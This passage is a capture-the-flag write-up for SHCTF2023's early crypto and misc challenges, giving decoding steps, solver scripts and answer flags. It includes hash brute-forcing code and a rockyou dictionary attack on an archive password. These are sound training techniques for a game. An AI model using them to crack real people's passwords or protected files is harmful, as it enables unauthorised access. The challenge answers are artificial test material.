SHCTF2023


Crypto

[WEEK1]Crypto_Checkin

Downloading the attachment gives the challenge text:

QZZ|KQbjRRS8QZRQdCYwR4_DoQ7~jyO>0t4R4__aQZQ9|Rz+k_Q!r#mR90+NR4_4NR%>ipO>0s{R90|SQhHKhRz+k^S8Q5JS5|OUQZO}CQfp*dS8P&9R8>k?QZYthRz+k_O>0#>

Decoding with CyberChef shows four layers of encoding: base85, base64, base32 and hex, in that order. Peeling them off gives the flag.

The base85 layer decodes to:

R1kzRE1RWldHRTNET04yQ0dVMkRNT0JUR0UzVEdOS0dHTVlUT01aVklZMkRFTVpVRzRaVEdNWlZJWVpUR05TRkdZWlRHTUJXR1FaVEdOMkU=

The base64 layer decodes to:

GY3DMQZWGE3DON2CGU2DMOBTGE3TGNKGGMYTOMZVIY2DEMZUG4ZTGMZVIYZTGNSFGYZTGMBWGQZTGN2E

The base32 layer decodes to:

666C61677B546831735F31735F423473335F336E633064337D

The hex layer decodes to:

flag{Th1s_1s_B4s3_3nc0d3}
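
The same peeling can be automated. The following is an added example, not part of the original write-up: it tries the most restrictive alphabet first and stops once a flag-shaped string appears. The sample input is constructed in the code with the same hex, base32, base64, base85 stacking, and the `flag{...}` stop condition is an assumption.

```python
# Added example: peel stacked text encodings until a flag-shaped string appears.
import base64
import binascii
import re

FLAG_RE = re.compile(r"flag\{[ -~]+\}")  # assumed flag format

# Most restrictive alphabet first, so a hex string is not mistaken for base64.
DECODERS = [
    ("hex", re.compile(r"(?:[0-9A-Fa-f]{2})+"), bytes.fromhex),
    ("base32", re.compile(r"[A-Z2-7]+=*"), base64.b32decode),
    ("base64", re.compile(r"[A-Za-z0-9+/]+={0,2}"),
     lambda s: base64.b64decode(s, validate=True)),
    ("base85", re.compile(r"[0-9A-Za-z!#$%&()*+\-;<=>?@^_`{|}~]+"),
     base64.b85decode),
]


def peel(text, max_layers=16):
    """Return (plaintext, [layer names in the order they were removed])."""
    layers = []
    for _ in range(max_layers):
        if FLAG_RE.fullmatch(text):
            return text, layers
        for name, alphabet, decode in DECODERS:
            if not alphabet.fullmatch(text):
                continue
            try:
                out = decode(text).decode("ascii")
            except (ValueError, binascii.Error):
                continue
            # Reject decodes that produce binary junk: wrong guess for this layer.
            if out.isprintable():
                text = out
                layers.append(name)
                break
        else:
            raise ValueError("no decoder produced printable text")
    raise ValueError("too many layers")


def wrap(flag):
    """Build a constructed sample: hex, then base32, base64 and base85 on top."""
    data = flag.encode().hex().upper().encode()
    for encode in (base64.b32encode, base64.b64encode, base64.b85encode):
        data = encode(data)
    return data.decode()


SAMPLE = wrap("flag{constructed_sample}")  # constructed input, not the challenge text

if __name__ == "__main__":
    print(peel(SAMPLE))
```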

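[WEEK1] Damaged md5

Yuan Qing picked up a note by the roadside with a string written on it: KCLWG?K8M9O3?DE?84S9
The question marks are smudged characters. The back of the note says the smudged characters are uppercase letters, and also gives the md5 of the string: F0AF????B1F463????F7AE???B2AC4E6
Submit the complete md5 value wrapped in flag{}.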

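The task is to match a partially known md5 against a partially known string. The approach is to loop over the uppercase letters in Python, build each candidate string, hash it with md5, and keep the digest that fits the known parts.

import hashlib
import re
from itertools import product
from string import ascii_uppercase

# Known md5 with the smudged hex digits written as '?', turned into a regex.
mask = "F0AF????B1F463????F7AE???B2AC4E6"
pattern = re.compile(mask.replace("?", "[0-9A-F]"))

# Try every uppercase letter in the three smudged positions.
for i, j, m in product(ascii_uppercase, repeat=3):
    flag = "KCLWG" + i + "K8M9O3" + j + "DE" + m + "84S9"
    result = hashlib.md5(flag.encode("utf-8")).hexdigest().upper()
    if pattern.fullmatch(result):
        print(result)

The md5 value is F0AF1443B1F463EAFFF7AEBB8B2AC4E6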

[WEEK1] Caesar the Great

pvkq{mredsrkyxkx}

As the challenge name hints, this is a Caesar cipher; decrypt it with CyberChef.

With a shift of 16 the plaintext is:

flag{chutihaonan}

[WEEK1] Number Base

Such a familiar base, but I don't know how many layers were applied
3636366336313637376236313638363636623661366336383662363136383764

The challenge suggests hex.

Decoding the first layer gives:

666c61677b6168666b6a6c686b61687d

Decoding the second layer gives:

flag{ahfkjlhkah}

[WEEK1]okk

Challenge:

Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook? Ook. Ook? Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook! Ook! Ook! Ook!
Ook! Ook! Ook? Ook. Ook? Ook! Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook. Ook? Ook! Ook. Ook? Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook!
Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook!
Ook! Ook! Ook! Ook? Ook. Ook? Ook! Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook!
Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook!
Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook.
Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook.
Ook. Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook.
Ook? Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook?
Ook.

Running it through an Ook! decoder gives:

flag{123456789}

[WEEK1] Xiong Feite

Challenge:

Dr. Xiong Feite has discovered a new cipher.
uozt{zgyzhs xrksvi}

Judging from the challenge, this is the Atbash cipher.

Decoding gives:

flag{atbash cipher}

[WEEK1] Thick Fog

Challenge:

Description:

morse?ASCII?

Ciphertext:


0010 0100 01 110 1111011 11 111 010 000 0 001101 00 000 001101 0001 0 010 1011 001101 0010 001 10 1111101

Following the hint, decoding it as Morse code gives:

flag{morse_is_very_fun}
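
The hint "morse?ASCII?" fits a ciphertext that mixes two encodings: short tokens are Morse with 0 as dot and 1 as dash, and the 7-symbol tokens are binary ASCII codes (the braces). The decoder below is an added example, not part of the original write-up; the split rule is an assumption inferred from the ciphertext above.

```python
# Added example: decode a 0/1 ciphertext that mixes Morse and 7-bit ASCII.
# Assumption: 0 = dot, 1 = dash; a token of exactly 7 symbols is an ASCII code.
import string

_CODES = (".- -... -.-. -.. . ..-. --. .... .. .--- -.- .-.. -- -. --- .--. "
          "--.- .-. ... - ..- ...- .-- -..- -.-- --..").split()
MORSE = dict(zip(_CODES, string.ascii_uppercase))
MORSE.update({
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    "..--.-": "_",
})


def decode_token(token):
    """Decode one space-separated token of 0s and 1s."""
    if not token or set(token) - {"0", "1"}:
        raise ValueError(f"unexpected symbol in {token!r}")
    if len(token) == 7:
        # Too long for the Morse table above: read it as a binary ASCII code.
        return chr(int(token, 2))
    morse = token.translate(str.maketrans("01", ".-"))
    if morse not in MORSE:
        raise ValueError(f"unknown Morse sequence {morse!r}")
    return MORSE[morse]


def decode(ciphertext):
    # Morse has no letter case; lower-case the result to match the flag format.
    return "".join(decode_token(t) for t in ciphertext.split()).lower()


# Ciphertext copied from the challenge above.
CIPHERTEXT = ("0010 0100 01 110 1111011 11 111 010 000 0 001101 00 000 001101 "
              "0001 0 010 1011 001101 0010 001 10 1111101")

if __name__ == "__main__":
    print(decode(CIPHERTEXT))
```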

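[WEEK1] Unspeakable Regret

Description:
We could have entered the information age earlier, but the Qing government refused to adopt that encoding scheme. (Note: the flag is in Chinese; submit it wrapped in flag{}.)

Ciphertext:
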

000111310008133175592422205314327609650071810649

From the description this looks like Chinese telegraph code; decoding gives:

一天不学高数我就魂身难受

[WEEK1] Cute Little Rabbit

Description: What is the ultimate answer to the universe?
U2FsdGVkX1/lKCKZm7Nw9xHLMrKHsbGQuFJU5QeUdASq3Ulcrcv9
You may need a key, and the key is the answer to the question.

The challenge points to Rabbit encryption with the key 42.

Decrypting gives:

flag{i_love_technology}

[WEEK1] what is m

from Crypto.Util.number import bytes_to_long
from secret import flag

m = bytes_to_long(flag)
print("m =",m)

# m = 7130439814059477413771863538044548993245251660073838020411807105607801507451075252124658989164881490641702328395728224520288268685033299812787734568748819610532741806627627101671065156596093

The challenge converts the flag from bytes to a long integer, so to recover the flag we only need to convert m from long back to bytes:

from Crypto.Util.number import bytes_to_long, long_to_bytes
"""from secret import flag

m = bytes_to_long(flag)
print("m =",m)
"""
m = 7130439814059477413771863538044548993245251660073838020411807105607801507451075252124658989164881490641702328395728224520288268685033299812787734568748819610532741806627627101671065156596093

flag = long_to_bytes(m)
print("flag:", flag)

The flag is:

flag{ther3_are_SeVeRA1_a1TeRNat1VES_to_TH3_1ON6_t0_8yteS_fuNc7l0n_24A9B2EF44d1}

[WEEK1] Song of Darkness

Challenge:

⠴⡰⡭⡳⠴⡰⡭⡰⡷⡲⡢⡩⡭⡡⠯⡩⡭⡡⡺⡩⡭⡡⠳⡩⡭⡡⡺⡩⡭⡡⡶⡩⡭⡡⡶⡩⡭⡡⡲⡩⡭⡡⡺⡩⡭⡡⠯⡩⡧⡊⡢⡩⡭⡡⠯⡩⡭⡡⡺⡃⡰⠫⡋⡚⡲⡍⡋⡮⠴⡰⡭⡶⡷⡲⡢⡩⡧⡊⡢⡃⡴⡵⡋⡁⡬⡵⡋⡁⡬⡵⡋⡁⡬⡳⡋⠲⠴⡯⡃⡗⠴⡰⡭⡴⠴⡰⡭⡶⡷⡲⡢⡩⡧⡊⡢⡩⡭⡡⡺⡩⡭⡡⡺⡩⡭⡡⠳⡩⡧⡊⡢⡩⡭⡡⠯⡩⡧⡊⡢⡃⡴⡵⡋⡚⡱⠫⡋⡚⡱⠫⡋⡚⡲⠵⠲⡺⠰⠽

After Braille decoding (decoder website):

4pms4pmpwrbima/imazima3imazimavimavimarimazima/igJbima/imazCp+KZrMKn4pmvwrbigJbCtuKAluKAluKAlsK24oCW4pmt4pmvwrbigJbimazimazima3igJbima/igJbCtuKZq+KZq+KZrz0=

After base64 decoding:

♬♩¶♯♬♭♬♫♫♪♬♯‖♯♬§♬§♯¶‖¶‖‖‖¶‖♭♯¶‖♬♬♭‖♯‖¶♫♫♯=

After decoding the music-note cipher:

flag{b2cc-9091-8a29}

[WEEK1] really_ez_rsa

Challenge:

from Crypto.Util.number import getPrime, bytes_to_long
e = 65537
m = b''

p = getPrime(128)
q = getPrime(128)
n = p * q
m = bytes_to_long(m)
c = pow(m, e, n)

print("p =", p)
print("q =", q)
print("c =", c)
print("e =", e)
# p = 217873395548207236847876059475581824463
# q = 185617189161086060278518214521453878483
# c = 6170206647205994850964798055359827998224330552323068751708721001188295410644
# e = 65537

The challenge gives q, p, e and c directly, so we just write a decryption script:

from Crypto.Util.number import long_to_bytes
import gmpy2


p = 217873395548207236847876059475581824463
q = 185617189161086060278518214521453878483
c = 6170206647205994850964798055359827998224330552323068751708721001188295410644
e = 65537

phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = gmpy2.powmod(c,d,p*q)

print(long_to_bytes(m))

The flag is:

flag{Y0ung_meiyou_xiaojj}

[WEEK2] Hash Cat

import hashlib
from secret import flag

assert flag[:5] == "flag{"
assert flag[-1:] == "}"
flag = flag[5:-1]
assert len(flag) == 43


print(hashlib.sha224(flag[0:2].encode()).hexdigest())
print(hashlib.sha256(flag[2:4].encode()).hexdigest())
print(hashlib.sha1(flag[4:7].encode()).hexdigest())
print(hashlib.sha1(flag[7:10].encode()).hexdigest())
print(hashlib.sha512(flag[10:12].encode()).hexdigest())
print(hashlib.md5(flag[12:15].encode()).hexdigest())
print(hashlib.sha256(flag[15:17].encode()).hexdigest())
print(hashlib.sha384(flag[17:19].encode()).hexdigest())
print(hashlib.sha256(flag[19:21].encode()).hexdigest())
print(hashlib.sha256(flag[21:23].encode()).hexdigest())
print(hashlib.sha256(flag[23:25].encode()).hexdigest())
print(hashlib.sha512(flag[25:27].encode()).hexdigest())
print(hashlib.sha224(flag[27:29].encode()).hexdigest())
print(hashlib.sha384(flag[29:31].encode()).hexdigest())
print(hashlib.md5(flag[31:34].encode()).hexdigest())
print(hashlib.sha512(flag[34:36].encode()).hexdigest())
print(hashlib.sha224(flag[36:38].encode()).hexdigest())
print(hashlib.sha256(flag[38:40].encode()).hexdigest())
print(hashlib.sha512(flag[40:42].encode()).hexdigest())
print(hashlib.md5(flag[42:43].encode()).hexdigest())


# 705460fa432983620cfdf55397e43161edf3367cdafe157ca0b46bc6
# ec61c8382b2d371090060b081d3c567f022bb6defd91e9defcbbe0787f080882
# 2b3e56ece4f0b1dadf21c5f01c1cd1124bdbbe45
# d309bebf43d3cdf7dfd1bc7e1de16f8b5b12deac
# e91e6821acdad6a65eff85d9d0b11df30392ce5f1c424058bce0029bf390d923d43d6d1ab3d84a638712bba566cbb18743ed372aa1c95ec7c83177d74e60cb20
# 90f80fa3a342375d71f427bf2fd61cd2
# ef2a3319810f3ae9cd5948f3229bc195d7b1558846487473b21a842f9d1b503b
# b655988f676a1494a400c8acead965a04b828e9538887e471a7985a12523cbe8027b838b49e7c548b43a633dfa81b010
# 688c5a4a65af33d6ddb7a8cb8e0d934e42d0f417a1b0fb6f755e050aa15a9dae
# fdee4726c2847c8788b39cb69f2777cf672711bb11d9622b07f0fe23fac1480e
# 051603900bc7a27051b385299b0ef6c3dd2da3c6216845df7f501d9e4337cbcd
# 38f3476fe78a5ac95ed2e2da792de22645c92f1466b30704c6d8d5d725325da9c742c5e8a3704caaea8b19d4b211780d32b7658958b6bb3f58f6f868f86e522c
# b162f6c91e9d02b7eba0c8dc0d4b0ac20002d47bcafa29699a54a682
# 34cfd54dcf443a572cbfa7c1cb90af1b580b98d4d42274ea3c99c25390065a985c81354ddc2e54e243f5be21b90f435b
# 50680fbb1bc80ff7ac8d5cdd0bee77fd
# 5b1fac8ceb254baeb8a794c105ef61f99b59d592ad1803b614be85fe12311a9b68307570f4e996fb20dbe82e2fcd65b0da16ecfa5577cebf178e0beabe271112
# a715591d887d66ed248ae4cc5aea34995d2feeb1130de534a7ecfdde
# 472e73d796e20aa8ff9059e6316f218e0322548f661ec4dc267507ed66317404
# d364a863110f07538a9f0e6b1e42b382979a7b26a53a554ecd35b8f08634ee8067119c4ddc48b9b1a0f6c266fdaeb698dfda95f122b2314e55700aa244fbe138
# 45c48cce2e2d7fbdea1afc51c7c6ad26

The flag is split into many groups that are hashed separately, so the plaintext of each hash is very short and brute force is the obvious approach.

import hashlib
from itertools import product

# Candidate characters for the flag body.
str_list = "0123456789!#$%&'()*+-/=<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_"

# (hash algorithm, plaintext length, digest) for each slice, in the order the challenge prints them.
targets = [
    ("sha224", 2, "705460fa432983620cfdf55397e43161edf3367cdafe157ca0b46bc6"),
    ("sha256", 2, "ec61c8382b2d371090060b081d3c567f022bb6defd91e9defcbbe0787f080882"),
    ("sha1", 3, "2b3e56ece4f0b1dadf21c5f01c1cd1124bdbbe45"),
    ("sha1", 3, "d309bebf43d3cdf7dfd1bc7e1de16f8b5b12deac"),
    ("sha512", 2, "e91e6821acdad6a65eff85d9d0b11df30392ce5f1c424058bce0029bf390d923d43d6d1ab3d84a638712bba566cbb18743ed372aa1c95ec7c83177d74e60cb20"),
    ("md5", 3, "90f80fa3a342375d71f427bf2fd61cd2"),
    ("sha256", 2, "ef2a3319810f3ae9cd5948f3229bc195d7b1558846487473b21a842f9d1b503b"),
    ("sha384", 2, "b655988f676a1494a400c8acead965a04b828e9538887e471a7985a12523cbe8027b838b49e7c548b43a633dfa81b010"),
    ("sha256", 2, "688c5a4a65af33d6ddb7a8cb8e0d934e42d0f417a1b0fb6f755e050aa15a9dae"),
    ("sha256", 2, "fdee4726c2847c8788b39cb69f2777cf672711bb11d9622b07f0fe23fac1480e"),
    ("sha256", 2, "051603900bc7a27051b385299b0ef6c3dd2da3c6216845df7f501d9e4337cbcd"),
    ("sha512", 2, "38f3476fe78a5ac95ed2e2da792de22645c92f1466b30704c6d8d5d725325da9c742c5e8a3704caaea8b19d4b211780d32b7658958b6bb3f58f6f868f86e522c"),
    ("sha224", 2, "b162f6c91e9d02b7eba0c8dc0d4b0ac20002d47bcafa29699a54a682"),
    ("sha384", 2, "34cfd54dcf443a572cbfa7c1cb90af1b580b98d4d42274ea3c99c25390065a985c81354ddc2e54e243f5be21b90f435b"),
    ("md5", 3, "50680fbb1bc80ff7ac8d5cdd0bee77fd"),
    ("sha512", 2, "5b1fac8ceb254baeb8a794c105ef61f99b59d592ad1803b614be85fe12311a9b68307570f4e996fb20dbe82e2fcd65b0da16ecfa5577cebf178e0beabe271112"),
    ("sha224", 2, "a715591d887d66ed248ae4cc5aea34995d2feeb1130de534a7ecfdde"),
    ("sha256", 2, "472e73d796e20aa8ff9059e6316f218e0322548f661ec4dc267507ed66317404"),
    ("sha512", 2, "d364a863110f07538a9f0e6b1e42b382979a7b26a53a554ecd35b8f08634ee8067119c4ddc48b9b1a0f6c266fdaeb698dfda95f122b2314e55700aa244fbe138"),
]

def crack(algo, length, digest):
    # Enumerate every string of the given length until its digest matches.
    for chars in product(str_list, repeat=length):
        guess = "".join(chars)
        if hashlib.new(algo, guess.encode()).hexdigest() == digest:
            return guess
    raise ValueError("no match for " + digest)

flag = "".join(crack(algo, length, digest) for algo, length, digest in targets)
# The last slice, flag[42:43], is a single character: '9'.
a20 = '9'
flag += a20
print(flag)

Misc

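[WEEK1] Please Use Social Engineering on Me

The picture provided gives us the following clues: 万达东厅 (Wanda East Hall), a shop called 一家幸运好玩的点, and part of the mall's decoration.

Searching for 一家幸运好玩的店 in a search engine turns up a picture.

The staircase behind the lottery shop in it resembles the one in the challenge picture, which places the location in Dongying, Shandong. Dongying has only one China University of Petroleum, so flag{山东省____东营市____东营区_中国石油大学}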

[WEEK1] Maybe You Need Some py

Opening the challenge archive reveals Morse code, which decodes to:

this1sy0ukey

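Using this as the password extracts the archive.

This yields a file with no extension and a txt file.

Opening the flag file in 010 Editor shows a damaged file header; after replacing it with the PNG header the image opens correctly.

Combining that with the flag.txt file:

import hashlib

def letter(s: str):
    """Return every upper/lower-case variant of s."""
    res = []

    def dfs(idx, n, s: str):
        if idx == n:
            res.append(s)
            return
        # Branch 1: flip the case of the character at idx (letters only).
        if s[idx].islower():
            dfs(idx + 1, n, s[:idx] + chr(ord(s[idx]) - 32) + s[idx + 1:])
        if s[idx].isupper():
            dfs(idx + 1, n, s[:idx] + chr(ord(s[idx]) + 32) + s[idx + 1:])
        # Branch 2: keep the character unchanged.
        dfs(idx + 1, n, s)

    dfs(0, len(s), s)
    return res

for s in letter("pNg_and_Md5_SO_GreaT"):
    if hashlib.md5(s.encode(encoding='UTF-8')).hexdigest() == "63e62fbce22f2757f99eb7da179551d2":
        print(s)
        print("su")
        exit()

The flag is:
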
flag{Png_AnD_md5_so_GReAt}

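[WEEK1] ez-misc

The 01game file contains 841 zeros and ones. 841 = 29 x 29, so this is a QR code.

from PIL import Image

strings = open(r"01game.txt", 'r').read()

pic = Image.new("RGB", (29, 29))
num = 0
for x in range(29):
    for y in range(29):
        # '1' is a black module, anything else is white.
        if strings[num] == '1':
            pic.putpixel((x, y), (0, 0, 0))
        else:
            pic.putpixel((x, y), (255, 255, 255))
        num += 1
pic.show()

This produces a QR code.

Scanning it gives:

hit_k1sme4_4_fun

This is the archive password. Extracting gives a flag file; 010 Editor shows it is a zip file, and after changing the extension we have a password-protected archive that comes with a hint:
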
01110010011011110110001101101011011110010110111101110101

This decodes to:

rockyou

That points to Kali's rockyou wordlist. A dictionary attack with that wordlist finds the password:

palomino

flag.txt contains:

ksgeylalssgSlHffgS{{gHklesgg{afkH{lHalSkgygf{{kfgslg1l11Ss{ellal{f{fka{l{gllaHf1elSsa14Hyl}f}Slmyfg4gleSlk1k{Sfggga4aHg}SlllgHHfgy1Sgaakfga1HmH{sylgs{ffkHyyaals{S{almklagfskyg{f1a1yffe{{SSSylHagf1{S{Ham{Sf}ga}fHlgl{aSl1{lkyfff}flkHffaagHegSaHSkafgH{ymaykSylS{{1llf{efeHfaalaSafflmSlylaslfk}mlllaaHSfk{SyH{yayyf{lyy1ylaff{aaygfl2333amSaeHy{fms{ySamkSga{ffylaalHlfgfglafHSSH{algmff1SSHHflSkSeygff14sgSl1ff41HkHaaal{k553klgfffmslk{Haylam{{llfggSlggaya{SaSg{lya{fflyaafk{aflkgay{kHg{fgkff1{akefeSlfmySkgglka{mSfmSemgykSSl1gfgHllgkygmfafmfakaaegafHgklSklaaH1HglgfeS41lgkS{ggaHmmSlfykfas4f{afgHaa{ylaf{{eHS4lHf{gfg{eSlSf{gsaSgyfSyHfHHagkSaS{{fa1yalsf{flf1f{{{fafakfsmaef4amHsyfSaH56789gfl{{{1yySlkael41Say{faffaSHy4Ss{eHyfmlykSm}{{ygaalgg{kHlHelffHasfaaf{SykfS666l{SS1{SygfgaHgSllf4effgHHykklSl1ga1lHafsy{f{141yaakllla1al4SaffgflalkSS1llg1{af{SyygsSSseHffemfHlaflfgkeag{gfSgmlkmflSlgHkSfylffllHya{ksgySlHHglg{H1lyf{f1gggHaffS{afalafg7825fakaSfyfg11gfHkfySsaaafff1{mfgalfa{gay1ySf{asHgg1HaHfkl1la11fsg{S11all{g{lyfHeala{f1agg{fHHglH1{SSfaSleyayaSy{yHylyHHl{ggayf}f11a{asf{gmf{{{SykHk1sSm1l}sgmSSff11a}SaSfHsmg}g{kallf{llHssl{ffsffagHgkHaa{f{f{alfglgaaS4sgHmkgSagl1lfSslfHyf{fglH{llfsaaSaglslgy11yfykHygf{lyfyfg}gafgSfaeg4fka{SaHllk{{fks{1f1S1gyl{fflkyllafHl1Sslgyga{llkHlHyaylgaf{skSH1yyfgf{Sflg{4aHSa{kkekH{yygmygl{gf1aleglfm{ygHSHHykSH{Hl{y{{Sa{k{gg1ayfayg{gSg{ffg1llHsa{Hls1Slfg{m{fHHf{mm{l1llk{fffeyH4falla#s1{lyggaykeffS{lkgls{gkeak{l1gS{kH4f{lglgkSagS1yfem11{ml1fsklyllSlgfseag{glkSSfl1ylffalmgfsfaHly4k{saSSkkSH{malf{{g{gSm1lafyy{lsall}aHg1aafaS1klSaHHa{llfSesaySgafgeySllaH1s{gygHHSfy{HSa{l{ffka1alkfagsge{lfgflgk{Slfl{ya{gff1aHmfSgHSsf1SalS5656alfyyllfa{yk{s{{lfaSay{{gaH{HS{aSly1slyHfgaHm{S{ggffmSHakafaSHmSHS{alkggfkHHgy{eS1g{HklfHgH{a41a{gsflgfaygSsfaglygl1ffHlysllsSsf{HlHaaSl{kgflkH{sgykyHfsyHly{klHgSfSal4f1lya4lkala{f(SH{laf1kffyylfflgffg}Sa1HsllSSS1aHgglHl{alHffg1eylsffsysllkSfllgylS{fHSSmlagHflSH1Hmalsg{af{SlySleyfHfasH}SeyalslkagySHaffaffmfggaam1kal{Sff{{alg{s{lsgHmaHSmllgHfaHSl11sHlgy
gskgHmkaaa1fllfggf{ggygffygfyfkgS1sgS{gfflHa1lagSe{fffga1sS{{H{gSsfHSg}Ha{Slf#$%1asa1gyfllS{yflyg1sSSmkfyykfggaHfHHkSfa{fSleskmagslgeflllayff{ySslySl}kf{agsgkkmHklHSs{k}glllmys1fSll1fSgyy{{sa{mga{gaka1lH1malfklSHaaklfklf1fglakalyaHas1ff4HfffSayg{{gH1kse{gage{skHaSHy1fekHgayk1gkgmS{g{1glgSfy{mg{asg{fkafalfygf{l1SHSl1ka{{ayHkS1g{ay1glSaSHa{Hsff1lfS4H{{ae1lHSlllSmafHSH{kak{ggy1H{fagSH4a1HfSgl{a}a{Sf{lHHf{kayl1l{flSfglfelySggfal{a}{aa{S1gf1SaHfaf{SmaSgHl{falHyggHg{ggglff{klfkSfyllSgk}gfafayHHygaflkS{als{SflkSls1fSgygygf4fHHge}flyggafS{fmafl{fyykHafSHH{14af1ysaH{lkfk{kSS1{fafH{1mHall{sflffa1fl1llf1SkyfafeHa{gfkSlggfsgmSlH{gSllHaSHa1{faSyllyysa{1sfla{1SmfSgy1lslayfaya1agHl4a{fSmmaklHkafkfHfgyHSS{{ay{ylaH1ylHH{gsyHHflfSyg2^%efSlfygg{Sfa{{kSfy{fHlaag{lllagl{aSfkHkgaSfafSfSafl1yss1ymHSSseafk{{a{f{Sa{Hsffffyam4HmmkSakfagyHkglgSefsagmHSaa{lSlykH{lSlHagysgak{llfys{4{Sl4gyamfa{yllf{SSgf{{4g{{alfkg{yklaSgyklyHglsalgfaS4aH4llk{Sl{gkyH{kgsSg{kgkma}kya{sgf{Hfll1ay@gk4sSgeHg{4fHlsskaSaaffffHHSgakSmS1lsa{gsSf{gfylH{l1{gHSaga{lgkkHHH{mfkgHaf1{SlSkHffggsH{HlHmSyfylHSg1SlgggafSHSalfgfae1S1amHfele{lyf11SgSsS{fSs1g{S1yyfSylS{sgSlg{lflSSeaSSgsHSegllygylaflag{}fglgHlSaH{SsaalyHfgkalfyfHmly1fsyyySS4SasagflaS{{yfayl4HHlksl{lHkfSlfyaaff}HkffgSyHl{a1{gSglsafSmfegsgsHfkafSg{falmgf}{llHHkHkHyslagHyfg{f{{lSe{gaSmfH1y{{g{}as1{{af{flH{gaglSSaSaSffg1afgallggyaa{{yalS4ykSySk1gky{gs{g{ll1lSlyafykgg1fs{4{1fslfS{slkSy4mskHkflyf{lk4f1aS2359afall1kk{eg1fyH{l1agylyf{HkSyg{mall{l1g1f1laayfHslalykkylslma{4s{HagSka1Hsal1kHkSSfSy1{Skyags{kHmfglglf{lg{fa1fgSmllmffksgafgl1aa{lmmay{ySglHfH4l4Hf{{{gllylgSafHgfHllSefgaSlf{fgf{lgSS@syl{gkSmkaykllHSy1ffkSS1aSfeggSgsyflHaHHlkklHaslf{}Ss{laaHalHSHyskSgkySl{{Sgsaf1Hlfaykg{Hkll{sasl1ffe{{kkkfgy1ffHflsglfgSfHffy11y{fffly1yklk{fHHmagalfygHaglfSfSSakfflaHffl{ffglfaHg{skaal{fHfSSfy1Hfffmy{llllffma{eaS{s{lgHHlSaef1glSfgH4esaSyHy{aSfagHlkll1fkfHf{m1SsSk}ygfylgS11{flkflkaksflafk{llsfafsfay{1lfgygHSgfH4gSfS{mySHasf1aSkffsykkS1lfHagffa{fHlyaHe{SSfS{}S{gyykefkl{{afl1ffykSkyH{klSsgfS
k{g1{f1klffSsa1{afaagH{s{a{1agafa1sfgmkf1gfylggSfkaSalHffHgf{gHSfgHsglmllsllyfmH{sySSgHSaa1flSfgkglms4{HffHgfgSaglafg{yakgg{algfyl{HH1feaagllgsHlfglaHkfkfglfy1{mHlmgfkSay1fHkfskmsyklsyska{{1HagHSySkHleflakkH{Sgfy{faff{Hgmk1fky1lffag{fSggySamlyfgffHgll{lfkSfHafyfal@@@ffllkmylf{yklH{aya{14yla{SlllyaHaaa{e1gamamaSskmkaafyalgffle{aHym{s1lf{l1aaSe{lgHf{klkHH{{{HlfyHaHaa1Sa{SSggHl1{magf11kH1kHsyg{{g1{afySmy111klykagHSksgflesggggleg{aalSm{asgfg1{ylHfa{alSllg{HkggksHlfml{a1HafamflHaa1alfygHSgS1l1fHaa1maSa{lfalalkSyaa{f

Character-frequency analysis gives the flag:

flag{SHyk1sme4}

[WEEK1] Check-in

Challenge:

Wm14aFozdDBhR2x6WDJselgyWnNZV2Q5

Decoding it as base64 twice gives:

flag{this_is_flag}

[WEEK1]Steganography

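Extracting the archive gives two pictures and another archive. Start with careful.jpg.

Opening it in 010 Editor shows this at the end of the file:

MTJlcmNzLi4uLi45MDlqaw==

This decodes to:

12ercs.....909jk

Next, careful1.jpg: its file properties contain:

xqwed

Replacing the five dots in the earlier string with it gives:

12ercsxqwed909jk

Extracting the archive with this password gives:
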
flag{4d72e4f3-4d4f-4969-bc8c-a2f6f7a4292c}

[WEEK1] Cute Paimon

Carving the image with binwalk yields two pieces of text; compare them and collect the differences.

def read_file(file_path):
    with open(file_path, 'r', encoding='utf-8') as file:
        return file.read()

def compare_files(file1_content, file2_content):
    # Collect the characters of file 2 at every position where the files differ.
    flag = ''
    for c1, c2 in zip(file1_content, file2_content):
        if c1 != c2:
            flag += c2
    return flag

if __name__ == "__main__":
    file1_path = r"C:\Users\g0ubu1i\Desktop\SHCTF\Misc\WEEK1\可爱的派蒙捏\_1.jpg.extracted\txt1.txt"
